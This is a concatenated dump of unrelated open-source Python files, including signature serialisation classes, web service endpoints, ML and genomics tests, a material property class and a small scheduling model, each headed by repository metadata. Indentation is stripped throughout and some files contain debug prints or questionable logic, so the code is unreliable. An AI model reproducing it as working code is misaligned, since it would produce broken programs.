def __init__(self, sig_id, hashes, score=0, flags=None, **kwargs):
self.sig_id = sig_id
self.score = score
self.hashes = hashes
self.flags = flags
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Signatures must have an unique ID. So we can safely compare them
based on ID only. """
return cmp_unsigned(self.binary["id"], other.binary["id"])
def __str__(self):
return "'%s' (%03d), '%s' (%08x), %02d, %r" % (
self.sig_id,
self.binary["id"],
self.flags,
self.binary["flags"],
self.score,
self.binary["hashes"],
)
def get_binary_header(self):
""" Returns a binary string representing the header of the signature
The format it's as follows:
- type[8] = 3
- size[16] = 12/10 + len(hashes) + hash_size * total_size_of_hashes """
struct_size = 10
hashes_size = 0
for hash_list in self.hashes:
hashes_size += len(hash_list) * 4
hashes_size += len(self.hashes)
return struct.pack("<BH", 3, struct_size + hashes_size)
def get_binary(self):
""" Returns a binary string containing the binary representation of the
signature.
The format it's as follows:
- id[32]
- flags[32]
- score[8]
- hash_list_count[8]
- hash-list-array[32 * hash_count] """
packed_hashes = bytes()
for hash_list in self.binary["hashes"]:
packed_hashes += struct.pack("B", len(hash_list))
for helem in hash_list:
packed_hashes += struct.pack("<I", helem)
return (
struct.pack(
"<IIBB",
unsigned(self.binary["id"]),
unsigned(self.binary["flags"]),
unsigned(self.score),
unsigned(len(self.binary["hashes"])),
)
+ packed_hashes
)
class ValueCodeSignature(Signature):
""" Represents a value code extended(pattern) signature. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values. """
if not self.sig_id:
raise ValueError("id is required!")
if not self.offset:
self.offset = 0
if self.offset > 32767:
raise ValueError("required offset >= 32767 (MAX_INT16)")
if self.offset < -32768:
raise ValueError("required offset <= -32768 (MIN_INT16)")
if not self.pattern:
raise ValueError("pattern is required!")
if not self.flags:
self.flags = DEFAULT_FLAGS["SignatureFlags"]
elif not any(arch in self.flags for arch in ["32", "64"]):
self.flags += " 32 64"
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
self.binary["id"] = get_sig_id(self.sig_id, excfg.get("SignatureType", "value-code"))
self.binary["flags"] = get_binary_flags(self.flags, Signature)
self.binary["pattern"] = list()
for pattern_elem in self.pattern:
self.binary["pattern"].append(int(pattern_elem, 16))
def __init__(self, sig_id, pattern, offset, flags=None, **kwargs):
self.sig_id = sig_id
self.offset = offset
self.pattern = pattern
self.flags = flags
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Signatures must have an unique ID. So we can safely compare them
based on ID only. """
return cmp_unsigned(self.binary["id"], other.binary["id"])
def __str__(self):
return "'%s' (%03d), '%s' (%08x), %02d, %r" % (
self.sig_id,
self.binary["id"],
self.flags,
self.binary["flags"],
self.offset,
self.binary["pattern"],
)
def get_binary_header(self):
""" Returns a binary string representing the header of the signature
The format it's as follows:
- type[8] = 8
- size[16] = 12 + pattern_items * sizeof_pattern_item """
struct_size = 12
pattern_size = len(self.pattern) * 2
print(pattern_size)
return struct.pack("<BH", 8, struct_size + pattern_size)
def get_binary(self):
""" Returns a binary string containing the binary representation of the
signature.
The format it's as follows:
- id[32]
- flags[32]
- offset[16]
- length[16]
- pattern-array[16 * pattern_items] """
packed_pattern = bytes()
for pattern_elem in self.binary["pattern"]:
packed_pattern += struct.pack("<H", pattern_elem)
return (
struct.pack(
"<IIhH",
unsigned(self.binary["id"]),
unsigned(self.binary["flags"]),
self.offset,
unsigned(len(self.binary["pattern"])),
)
+ packed_pattern
)
class IdtSignature(Signature):
""" Represents an idt signature. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values. """
if not self.sig_id:
raise ValueError("id is required!")
if self.entry is None:
raise ValueError("entry is required!")
if not self.flags:
self.flags = DEFAULT_FLAGS["SignatureFlags"]
elif not any(arch in self.flags for arch in ["32", "64"]):
self.flags += " 32 64"
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
self.binary["id"] = get_sig_id(self.sig_id, excfg.get("SignatureType", "idt"))
self.binary["flags"] = get_binary_flags(self.flags, Signature)
self.binary["entry"] = self.entry
def __init__(self, sig_id, entry, flags=None, **kwargs):
self.sig_id = sig_id
self.entry = entry
self.flags = flags
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Signatures must have an unique ID. So we can safely compare them
based on ID only. """
return cmp_unsigned(self.binary["id"], other.binary["id"])
def __str__(self):
return "'%s' (%03d), '%s' (%08x), %02d, (%02d)" % (
self.sig_id,
self.binary["id"],
self.flags,
self.binary["flags"],
self.entry,
self.binary["entry"],
)
def get_binary_header(self):
""" Returns a binary string representing the header of the signature
The format it's as follows:
- type[8] = 10
- size[16] = 10/12"""
struct_size = 12
return struct.pack("<BH", 10, struct_size)
def get_binary(self):
""" Returns a binary string containing the binary representation of the
signature.
The format it's as follows:
- id[32]
- flags[32]
- entry[1]
- _reserved[3]
"""
return struct.pack(
"<IIBBBB",
unsigned(self.binary["id"]),
unsigned(self.binary["flags"]),
unsigned(self.entry),
0,
0,
0,
)
class VersionOsSignature(Signature):
""" Represents a version os signature. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values. """
if not self.sig_id:
raise ValueError('id is required!')
if self.minimum is None:
raise ValueError('minimum version is required!')
if '.' in self.minimum and '.' not in self.maximum:
raise ValueError('invalid os version format!')
if '.' not in self.minimum and '.' in self.maximum:
raise ValueError('invalid os version format!')
if '.' in self.minimum and len(self.minimum.split('.')) != 3:
raise ValueError('invalid os version format!')
if self.maximum is None:
raise ValueError('maximum version is required!')
if '.' in self.maximum and len(self.maximum.split('.')) != 3:
raise ValueError('invalid os version format!')
if not self.flags:
self.flags = DEFAULT_FLAGS['SignatureFlags']
elif not any(arch in self.flags for arch in ['32', '64']):
self.flags += ' 32 64'
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
self.binary['id'] = self.binary["id"] = get_sig_id(self.sig_id, excfg.get("SignatureType", "version-os"))
self.binary['flags'] = get_binary_flags(self.flags, Signature)
if '.' in self.minimum:
values = list()
for item in self.minimum.split('.'):
if item == '*':
values.append(0)
else:
values.append(unsigned(int(item)))
self.binary["minimum"] = {"version" : values[0], "patch" : values[1], "sublevel" :
values[2]}
else:
if self.minimum == '*':
self.binary['minimum'] = {"value" : 0}
else:
self.binary['minimum'] = {"value" : unsigned(int(self.minimum))}
if '.' in self.maximum:
values = list()
for item in self.maximum.split('.'):
if item == '*':
values.append(0xffff)
else:
values.append(unsigned(int(item)))
self.binary["maximum"] = {"version" : values[0], "patch" : values[1], "sublevel" :
values[2]}
else:
if self.maximum == '*':
self.binary['maximum'] = {"value" : 0xffff}
else:
self.binary['maximum'] = {"value" : unsigned(int(self.maximum))}
def __init__(self, sig_id, minimum, maximum, flags=None, **kwargs):
self.sig_id = sig_id
self.minimum = minimum
self.maximum = maximum
self.flags = flags
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Signatures must have an unique ID. So we can safely compare them
based on ID only. """
return cmp_unsigned(self.binary['id'], other.binary['id'])
def __str__(self):
if 'value' in self.binary['minimum']:
return "'%s' (%04d), '%s' (%04x), %s (0x%04x), '%s' (0x%04x)" % (self.sig_id, self.binary['id'],
self.flags, self.binary['flags'],
self.minimum, self.binary['minimum']['value'],
self.maximum, self.binary['maximum']['value'])
else:
return "'%s' (%04d), '%s' (%04x), '%s' (%d.%d.%d), '%s' (%d.%d.%d)" % (self.sig_id, self.binary['id'],
self.flags, self.binary['flags'], self.minimum, self.binary['minimum']['version'],
self.binary['minimum']['patch'], self.binary['minimum']['sublevel'],
self.maximum, self.binary['maximum']['version'], self.binary['maximum']['patch'], self.binary['maximum']['sublevel'])
def get_binary_header(self):
""" Returns a binary string representing the header of the signature
The format it's as follows:
- type[8] = 11
- size[16] = 10/12"""
struct_size = 24
return struct.pack('<BH', 11, struct_size)
def get_binary(self):
""" Returns a binary string containing the binary representation of the
signature.
The format it's as follows:
- id[32]
- flags[32]
- minimum[32]
- maximum[32]
"""
if 'value' in self.binary["minimum"]:
return struct.pack('<IIQQ',
unsigned(self.binary['id']),
unsigned(self.binary['flags']),
unsigned(self.binary['minimum']['value']),
unsigned(self.binary['maximum']['value']))
else:
return struct.pack('<IIBBHHBBBBHHBB',
unsigned(self.binary['id']),
unsigned(self.binary['flags']),
unsigned(self.binary['minimum']['version']),
unsigned(self.binary['minimum']['patch']),
unsigned(self.binary['minimum']['sublevel']),
0,
0,
0,
unsigned(self.binary['maximum']['version']),
unsigned(self.binary['maximum']['patch']),
unsigned(self.binary['maximum']['sublevel']),
0xffff,
0,
0)
class VersionIntroSignature(Signature):
""" Represents a version os signature. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values. """
if not self.sig_id:
raise ValueError('id is required!')
if self.minimum is None:
raise ValueError('minimum version is required!')
if '.' not in self.minimum:
raise ValueError('invalid intro version format!')
if len(self.minimum.split('.')) != 3:
raise ValueError('invalid intro version format!')
if self.maximum is None:
raise ValueError('maximum version is required!')
if '.' not in self.maximum:
raise ValueError('invalid intro version format!')
if len(self.maximum.split('.')) != 3:
raise ValueError('invalid intro version format!')
if not self.flags:
self.flags = DEFAULT_FLAGS['SignatureFlags']
elif not any(arch in self.flags for arch in ['32', '64']):
self.flags += ' 32 64'
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
self.binary['id'] = self.binary["id"] = get_sig_id(self.sig_id, excfg.get("SignatureType", "version-intro"))
self.binary['flags'] = get_binary_flags(self.flags, Signature)
if '.' in self.minimum:
values = list()
for item in self.minimum.split('.'):
if item == '*':
values.append(0)
else:
values.append(unsigned(int(item)))
self.binary["minimum"] = {"major" : values[0], "minor" : values[1], "revision":
values[2]}
if '.' in self.maximum:
values = list()
for item in self.maximum.split('.'):
if item == '*':
values.append(0xffff)
else:
values.append(unsigned(int(item)))
self.binary["maximum"] = {"major" : values[0], "minor" : values[1], "revision":
values[2]}
def __init__(self, sig_id, minimum, maximum, flags=None, **kwargs):
self.sig_id = sig_id
self.minimum = minimum
self.maximum = maximum
self.flags = flags
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Signatures must have an unique ID. So we can safely compare them
based on ID only. """
return cmp_unsigned(self.binary['id'], other.binary['id'])
def __str__(self):
return "'%s' (%03d), '%s' (%08x), '%s' (%d.%d.%d), '%s' (%d.%d.%d)" % (self.sig_id, self.binary['id'],
self.flags, self.binary['flags'], self.minimum, self.binary['minimum']["major"], self.binary["minimum"]["minor"], self.binary["minimum"]["revision"],
self.maximum, self.binary['maximum']["major"], self.binary["maximum"]['minor'], self.binary["maximum"]["revision"])
def get_binary_header(self):
""" Returns a binary string representing the header of the signature
The format it's as follows:
- type[8] = 12
- size[16] = 10/12"""
struct_size = 24
return struct.pack('<BH', 12, struct_size)
def get_binary(self):
""" Returns a binary string containing the binary representation of the
signature.
The format it's as follows:
- id[32]
- flags[32]
- min[32]
- max[32]
"""
return struct.pack('<IIHHHHHHHH',
unsigned(self.binary['id']),
unsigned(self.binary['flags']),
unsigned(self.binary['minimum']['major']),
unsigned(self.binary['minimum']['minor']),
unsigned(self.binary['minimum']['revision']),
0x0,
unsigned(self.binary['maximum']['major']),
unsigned(self.binary['maximum']['minor']),
unsigned(self.binary['maximum']['revision']),
0xffff)
class ProcessCreationSignature(Signature):
""" Represents a process-creaation signature. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values. """
if not self.sig_id:
raise ValueError('id is required!')
if self.create_mask is None:
raise ValueError('create-mask is required!')
if not self.flags:
self.flags = DEFAULT_FLAGS['SignatureFlags']
elif not any(arch in self.flags for arch in ['32', '64']):
self.flags += ' 32 64'
def _complete_binary_args(self):
""" Complete self.binary dictionary with the binary representations
of the self fields. """
self.binary['id'] = get_sig_id(self.sig_id, excfg.get("SignatureType", "process-creation"))
self.binary['flags'] = get_binary_flags(self.flags, Signature)
self.binary['create-mask'] = 0
for flag in self.create_mask:
print(excfg.get("ProcessCreationFlags", flag))
self.binary['create-mask'] = self.binary['create-mask'] | int(excfg.get("ProcessCreationFlags", flag), 16)
def __init__(self, sig_id, create_mask, flags=None, **kwargs):
self.sig_id = sig_id
self.create_mask = create_mask
self.flags = flags
self.binary = {}
self._validate_args()
self._complete_binary_args()
def _cmp(self, other):
""" Signatures must have an unique ID. So we can safely compare them
based on ID only. """
return cmp_unsigned(self.binary['id'], other.binary['id'])
def __str__(self):
return "'%s' (%04d), '%s' (%08x), '%s' (0x%08x) " % (self.sig_id, self.binary['id'],
self.flags, self.binary['flags'], self.create_mask, self.binary["create-mask"])
def get_binary_header(self):
""" Returns a binary string representing the header of the signature
The format it's as follows:
- type[8] = 12
- size[16] = 10/12"""
struct_size = 24
return struct.pack('<BH', 13, struct_size)
def get_binary(self):
""" Returns a binary string containing the binary representation of the
signature.
The format it's as follows:
- id[32]
- flags[32]
- create-mask[32]
"""
return struct.pack('<IIIIII',
unsigned(self.binary['id']),
unsigned(self.binary['flags']),
unsigned(self.binary["create-mask"]),
0,
0,
0)
|
examples/lp_train/models/__init__.py
|
drcut/QPyTorch
| 172 |
118317
|
<gh_stars>100-1000
from .vgg import *
from .vgg_low import *
from .preresnet import *
from .preresnet_low import *
|
library/shared/content_providers/content_detectors/source1_common.py
|
REDxEYE/SourceIO
| 199 |
118335
|
<gh_stars>100-1000
from pathlib import Path
from typing import Dict, Type
from .source1_base import Source1DetectorBase
from ..content_provider_base import ContentDetectorBase, ContentProviderBase
from .....library.utils.path_utilities import backwalk_file_resolver
from ..source1_content_provider import GameinfoContentProvider
from ..non_source_sub_manager import NonSourceContentProvider
class Source1Common(Source1DetectorBase):
@classmethod
def add_if_exists(cls, path: Path, content_provider_class: Type[ContentProviderBase],
content_providers: Dict[str, ContentProviderBase]):
super().add_if_exists(path, content_provider_class, content_providers)
cls.scan_for_vpk(path, content_providers)
@classmethod
def scan(cls, path: Path) -> Dict[str, ContentProviderBase]:
game_root = None
is_source = backwalk_file_resolver(path, 'platform') and backwalk_file_resolver(path, 'bin')
if is_source:
game_root = (backwalk_file_resolver(path, 'platform') or backwalk_file_resolver(path, 'bin')).parent
if game_root is None:
return {}
content_providers = {}
for folder in game_root.iterdir():
if folder.stem in content_providers:
continue
elif (folder / 'gameinfo.txt').exists():
cls.recursive_traversal(game_root, folder.stem, content_providers)
cls.register_common(game_root, content_providers)
return content_providers
@classmethod
def register_common(cls, root_path: Path, content_providers: Dict[str, ContentProviderBase]):
cls.add_if_exists(root_path / 'platform', NonSourceContentProvider, content_providers)
cls.add_if_exists(root_path / 'hl2', NonSourceContentProvider, content_providers)
cls.add_if_exists(root_path / 'garrysmod', NonSourceContentProvider, content_providers)
cls.add_if_exists(root_path / 'synergy', NonSourceContentProvider, content_providers)
|
cape_webservices/app/app_core.py
|
edwardmjackson/cape-webservices
| 164 |
118342
|
# Copyright 2018 BLEMUNDSBURY AI LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import time
from cape_api_helpers.exceptions import UserException
from cape_api_helpers.input import required_parameter, optional_parameter, list_document_ids
from cape_api_helpers.output import list_response, debuggable
from cape_api_helpers.text_responses import *
from cape_responder.responder_core import Responder
from cape_webservices.webservices_settings import MAX_SIZE_INLINE_TEXT, \
HOSTNAME, CONFIG_SERVER, MAX_NUMBER_OF_ANSWERS
from cape_responder.task_manager import connect
from cape_webservices.app.app_middleware import respond_with_json, requires_token
from cape_webservices.app.app_settings import URL_BASE
from cape_webservices.app.app_settings import app_endpoints
from cape_userdb.base import DB
from cape_userdb.event import Event
from cape_userdb.coverage import Coverage
_endpoint_route = lambda x: app_endpoints.route(URL_BASE + x, methods=['GET', 'POST'])
def square(x):
return x ** 2
def neg(x):
return -x
def store_event(user_id, question, answers, question_source, answered, duration, automatic=False):
if DB.is_closed():
DB.connect()
event = Event(user_id=user_id, question=question, question_source=question_source, answers=answers,
answered=answered, duration=duration, automatic=automatic)
event.save()
total = Event.select().where(Event.user_id == user_id).count()
automatic = Event.select().where(Event.user_id == user_id, Event.automatic == True).count()
# Base line of 60% from MR plus proportion answered by saved replies
coverage = 60 + (automatic / total) * 35
coverage_stat = Coverage(user_id=user_id, coverage=coverage)
coverage_stat.save()
DB.close()
@_endpoint_route('/test')
@debuggable
@respond_with_json
def _test(request):
client = connect()
A = client.map(square, range(10))
B = client.map(neg, A)
total = client.submit(sum, B)
return {'worker': os.getpid(), "token": request["args"]["token"], 'result': total.result(),
'hostname': HOSTNAME, 'port': CONFIG_SERVER['port']}
@_endpoint_route('/answer')
@debuggable
@respond_with_json
@list_response
@list_document_ids
@requires_token
def _answer(request, number_of_items=1, offset=0, document_ids=None, max_number_of_answers=MAX_NUMBER_OF_ANSWERS):
start_time = time.time()
number_of_items = min(number_of_items, max(0, max_number_of_answers - offset))
user_token = required_parameter(request, 'token')
question = required_parameter(request, 'question')
source_type = optional_parameter(request, 'sourceType', 'all').lower()
text = optional_parameter(request, 'text', None)
speed_or_accuracy = optional_parameter(request, 'speedOrAccuracy', 'balanced').lower()
saved_reply_threshold = optional_parameter(request, 'threshold', request['user_from_token'].saved_reply_threshold)
document_threshold = optional_parameter(request, 'threshold', request['user_from_token'].document_threshold)
if source_type not in {'document', 'saved_reply', 'all'}:
raise UserException(ERROR_INVALID_SOURCE_TYPE)
if speed_or_accuracy not in {'speed', 'accuracy', 'balanced', 'total'}:
raise UserException(ERROR_INVALID_SPEED_OR_ACCURACY % speed_or_accuracy)
else:
if request['user_from_token'].plan == "pro":
speed_or_accuracy = "total"
if text is not None and len(text) > MAX_SIZE_INLINE_TEXT:
raise UserException(ERROR_MAX_SIZE_INLINE_TEXT % (MAX_SIZE_INLINE_TEXT, len(text)))
results = []
if source_type != 'document':
results.extend(Responder.get_answers_from_similar_questions(user_token, question, source_type, document_ids,
saved_reply_threshold))
results = sorted(results, key=lambda x: x['confidence'],
reverse=True)
if (source_type == 'document' or source_type == 'all') and len(results) < number_of_items:
results.extend(Responder.get_answers_from_documents(user_token,
question,
document_ids,
offset,
number_of_items - len(results),
text, document_threshold, speed_or_accuracy))
results = results[offset:offset + number_of_items]
automatic = False
if len(results) > 0:
automatic = results[0]['sourceType'] == 'saved_reply' or results[0]['sourceType'] == 'annotation'
duration = time.time() - start_time
connect().submit(store_event,
request['user_from_token'].user_id,
question,
results,
'API',
len(results) > 0,
duration,
automatic)
return {'items': results}
if __name__ == '__main__':
import sanic.response
# Create a fake request
class MyDict(dict):
pass
request = MyDict({
"args": {
# 'token': '<KEY>',
'token': 'testtoken_answer',
'question': 'Who is <NAME>a?',
'threshold': 'low',
'documentIds': '',
'sourcetype': 'document',
'speedoraccuracy': '',
'numberofitems': '1',
'offset': '0'
}
})
request.headers = {}
response: sanic.response.HTTPResponse = _answer(request)
response_dict = json.loads(response.body.decode('utf-8'))
for i, item in enumerate(response_dict['result']['items']):
print("{} | {} | {} | {}".format(i + 1, item['text'], item['sourceType'], item['confidence']))
|
pyabc/external/__init__.py
|
ICB-DCM/pyABC
| 144 |
118365
|
<filename>pyabc/external/__init__.py
"""
External simulators
===================
This module can be used to easily interface pyABC with model simulations,
summary statistics calculators and distance functions written in arbitrary
programming languages, only requiring a specified command line interface
and file input and output.
It has been successfully used with models written in e.g. R, Java, or C++.
"""
from .r_rpy2 import R
from .base import (
ExternalHandler,
ExternalModel,
ExternalSumStat,
ExternalDistance,
create_sum_stat)
|
Easy/Please like me (PLSLYKME)/PLEASE LIKE ME.py
|
sakayaparp/CodeChef
| 127 |
118379
|
N=int(input("Enter the number of test cases:"))
for i in range(0,N):
L,D,S,C=map(int,input().split())
for i in range(1,D):
if(S>=L):
S+=C*S
break
if L<= S:
print("ALIVE AND KICKING")
else:
print("DEAD AND ROTTING")
|
tests/test_cross_entropy.py
|
KaiyuYue/torchshard
| 265 |
118381
|
from typing import Optional, List, Callable, Tuple
import torch
import random
import sys
import torch.nn.functional as F
import torch.multiprocessing as mp
import torch.nn.parallel as paralle
import unittest
import torchshard as ts
from testing import IdentityLayer
from testing import dist_worker, assertEqual, set_seed
from testing import loss_reduction_type, threshold
def torch_cross_entropy(batch_size, seq_length, vocab_size, logits_scale, seed, local_rank):
set_seed(seed)
identity = IdentityLayer((batch_size, seq_length, vocab_size),
scale=logits_scale).cuda(local_rank)
logits = identity()
target = torch.LongTensor(
size=(batch_size, seq_length)).random_(0, vocab_size).cuda(local_rank)
logits = logits.view(-1, logits.size()[-1])
target = target.view(-1)
loss = F.cross_entropy(logits, target, reduction=loss_reduction_type).view_as(target)
if loss_reduction_type == 'none':
loss = loss.sum()
loss.backward()
return loss, identity.weight.grad, logits, target
def torchshard_cross_entropy(batch_size, seq_length, vocab_size, logits_scale, seed, local_rank):
set_seed(seed)
identity = IdentityLayer((batch_size, seq_length, vocab_size),
scale=logits_scale).cuda(local_rank)
logits = identity()
target = torch.LongTensor(
size=(batch_size, seq_length)).random_(0, vocab_size).cuda(local_rank)
logits = logits.view(-1, logits.size()[-1])
target = target.view(-1)
logits_parallel = ts.distributed.scatter(logits, dim=-1)
loss = ts.nn.functional.parallel_cross_entropy(logits_parallel, target, reduction=loss_reduction_type)
if loss_reduction_type == 'none':
loss = loss.sum()
loss.backward()
return loss, identity.weight.grad, logits, target
class TestCrossEntropy(unittest.TestCase):
@staticmethod
def run_test_naive_cross_entropy(local_rank: int) -> None:
# settings
batch_size = 13
seq_length = 17
vocab_size_per_partition = 11
logits_scale = 1000.0
tensor_model_parallel_size = ts.distributed.get_world_size()
vocab_size = vocab_size_per_partition * tensor_model_parallel_size
seed = 1234
loss_torch, grad_torch, logits_torch, target_torch = \
torch_cross_entropy(batch_size, seq_length,
vocab_size, logits_scale,
seed, local_rank)
loss_ts, grad_ts, logits_ts, target_ts = \
torchshard_cross_entropy(batch_size, seq_length,
vocab_size, logits_scale,
seed, local_rank)
assertEqual(logits_torch, logits_ts, threshold=threshold)
assertEqual(target_torch, target_ts, threshold=threshold)
assertEqual(loss_torch, loss_ts, threshold=threshold)
assertEqual(grad_torch, grad_ts, threshold=threshold)
@unittest.skipIf(not torch.cuda.is_available(), 'CUDA is not available')
def test_naive_cross_entropy(self):
ngpus = torch.cuda.device_count()
mp.spawn(
dist_worker,
args=(self.run_test_naive_cross_entropy, ngpus),
nprocs=ngpus
)
ts.distributed.destroy_process_group()
if __name__ == '__main__':
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
unittest.main()
|
armi/materials/magnesium.py
|
celikten/armi
| 162 |
118383
|
<filename>armi/materials/magnesium.py
# Copyright 2019 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Magnesium.
"""
from armi.utils.units import C_TO_K
from armi.materials import material
class Magnesium(material.Fluid):
name = "Magnesium"
def setDefaultMassFracs(self):
self.setMassFrac("MG", 1.0)
def density(self, Tk=None, Tc=None):
r"""returns mass density of magnesium in g/cc
The Liquid Temperature Range, Density and Constants of Magnesium. <NAME>. Temple University 1961."""
self.checkTempRange(923, 1390, Tk, "density")
if not Tk and Tc:
Tk = Tc + C_TO_K
return 1.59 - 0.00026 * (Tk - 924.0)
|
contrib/integration/session/python/cppcmstest/tester/views.py
|
gatehouse/cppcms
| 388 |
118391
|
<gh_stars>100-1000
from django.http import HttpResponse
from django.conf import settings
import cppcms
#
# Create the session pool - note it is thread safe and should be one per projects
# Provide a path to configuration file
#
pool=cppcms.SessionPool(settings.BASE_DIR + '/config.js')
def bin2hex(val):
return ''.join('{:02x}'.format(x) for x in val)
def hex2bin(val):
return bytearray.fromhex(val)
def home(request):
session=pool.session()
session.load(django_request=request)
i = 0
output = []
while True:
i=i+1
id = "_" + str(i)
op_id = 'op' + id
key_id = 'key' + id
value_id = 'value' + id
print 'Checking ', op_id
if not op_id in request.GET:
break
op = request.GET[op_id]
if key_id in request.GET:
key = request.GET[key_id]
if value_id in request.GET:
value = request.GET[value_id]
result = 'ok'
if op=="is_set":
result = 'yes' if key in session else 'no'
elif op == "erase":
del session[key]
elif op == "clear":
session.clear();
elif op == "is_exposed":
result = 'yes' if session.get_exposed(key) else "no";
elif op == "expose":
session.set_exposed(key,int(value));
elif op == "get":
result = session[key];
elif op == "set":
session[key]=value;
elif op == "get_binary":
result = bin2hex(session.get_binary(key));
elif op == "set_binary":
session.set_binary(key,hex2bin(value));
elif op == "get_age":
result = str(session.get_age())
elif op == "set_age":
session.set_age(value)
print 'SET AGE DONE', value
elif op == "default_age":
session.default_age();
elif op == "get_expiration":
result = str(session.get_expiration())
elif op == "set_expiration":
session.set_expiration(int(value))
elif op == "default_expiration":
session.default_expiration();
elif op == "get_on_server":
result = 'yes' if session.get_on_server() else "no"
elif op == "set_on_server":
session.set_on_server(int(value))
elif op == "reset_session":
session.reset_session();
elif op == "csrf_token":
result = "t=" + session.csrf_token;
elif op == "keys":
ks=[]
for key in session.keys:
ks.append('[' + key + ']')
result = ','.join(ks)
else:
result = "invalid op=" + op;
msg = str(i) + ':' + result + ';'
print 'Res ' + msg
output.append(msg);
response = HttpResponse()
session.save(django_response=response)
response.write(''.join(output));
return response
|
InvenTree/stock/migrations/0024_auto_20200405_2239.py
|
ArakniD/InvenTree
| 656 |
118392
|
<gh_stars>100-1000
# Generated by Django 2.2.10 on 2020-04-05 22:39
import InvenTree.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('stock', '0023_auto_20200318_1027'),
]
operations = [
migrations.AlterField(
model_name='stockitem',
name='URL',
field=InvenTree.fields.InvenTreeURLField(blank=True, help_text='Link to external URL', max_length=125),
),
]
|
gcp_variant_transforms/transforms/densify_variants_test.py
|
tsa87/gcp-variant-transforms
| 113 |
118431
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for densify_variants module."""
import unittest
from apache_beam.testing.test_pipeline import TestPipeline
from apache_beam.testing.util import assert_that
from apache_beam.transforms import Create
from gcp_variant_transforms.beam_io import vcfio
from gcp_variant_transforms.testing import asserts
from gcp_variant_transforms.testing.testdata_util import hash_name
from gcp_variant_transforms.transforms import densify_variants
class DensifyVariantsTest(unittest.TestCase):
"""Test cases for the ``DensifyVariants`` transform."""
def test_densify_variants_pipeline_no_calls(self):
variant_calls = [
vcfio.VariantCall(sample_id=hash_name('sample1')),
vcfio.VariantCall(sample_id=hash_name('sample2')),
vcfio.VariantCall(sample_id=hash_name('sample3')),
]
variants = [
vcfio.Variant(calls=[variant_calls[0], variant_calls[1]]),
vcfio.Variant(calls=[variant_calls[1], variant_calls[2]]),
]
pipeline = TestPipeline()
densified_variants = (
pipeline
| Create(variants)
| 'DensifyVariants' >> densify_variants.DensifyVariants([]))
assert_that(densified_variants, asserts.has_sample_ids([]))
pipeline.run()
def test_densify_variants_pipeline(self):
sample_ids = [hash_name('sample1'),
hash_name('sample2'),
hash_name('sample3')]
variant_calls = [
vcfio.VariantCall(sample_id=sample_ids[0]),
vcfio.VariantCall(sample_id=sample_ids[1]),
vcfio.VariantCall(sample_id=sample_ids[2]),
]
variants = [
vcfio.Variant(calls=[variant_calls[0], variant_calls[1]]),
vcfio.Variant(calls=[variant_calls[1], variant_calls[2]]),
]
pipeline = TestPipeline()
densified_variants = (
pipeline
| Create(variants)
| 'DensifyVariants' >> densify_variants.DensifyVariants(sample_ids))
assert_that(densified_variants, asserts.has_sample_ids(sample_ids))
pipeline.run()
|
cpmpy/building_a_house.py
|
tias/hakank
| 279 |
118464
|
<reponame>tias/hakank
"""
Building a house, simple scheduling problem in cpmpy.
This model is adapted OPL model sched_intro.mod (examples).
'''
This is a basic problem that involves building a house. The masonry,
roofing, painting, etc. must be scheduled. Some tasks must
necessarily take place before others, and these requirements are
expressed through precedence constraints.
'''
The OPL solution is
'''
Masonry : 0..35
Carpentry: 35..50
Plumbing : 35..75
Ceiling : 35..50
Roofing : 50..55
Painting : 50..60
Windows : 55..60
Facade : 75..85
Garden : 75..80
Moving : 85..90
'''
With the extra objective (from the OPL model sched_time.mod) the result is
masonry : [20 -- 35 --> 55]
carpentry: [75 -- 15 --> 90]
plumbing : [55 -- 40 --> 95]
ceiling : [75 -- 15 --> 90]
roofing : [90 -- 5 --> 95]
painting : [90 -- 10 --> 100]
windows : [95 -- 5 --> 100]
facade : [95 -- 10 --> 105]
garden : [95 -- 5 --> 100]
moving : [105 -- 5 --> 110]
This cpmpy model was written by <NAME> (<EMAIL>)
See also my cpmpy page: http://hakank.org/cpmpy/
"""
from cpmpy import *
import cpmpy.solvers
import numpy as np
